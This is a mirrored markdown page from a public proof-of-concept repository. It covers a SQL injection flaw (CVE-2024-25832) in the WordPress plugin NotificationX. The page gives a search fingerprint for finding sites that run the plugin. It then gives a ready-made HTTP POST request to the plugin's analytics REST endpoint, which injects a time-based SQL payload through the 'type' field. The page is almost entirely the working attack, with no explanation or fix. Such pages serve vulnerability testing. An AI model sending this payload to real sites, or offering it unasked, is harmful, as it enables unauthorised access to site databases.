wy876_POC/WordPress插件NotificationX存在sql注入漏洞(CVE-2024-25832).md at 453da705f7e68864ed9fdce9e0fe0720d79f7df5

mirror of https://github.com/wy876/POC.git synced 2025-02-27 04:39:25 +00:00

wy876 a53115d03c

2024-04-28 20:27:08 +08:00

WordPress插件NotificationX存在sql注入漏洞(CVE-2024-25832)

body="/wp-content/plugins/notificationx"

POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: 
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}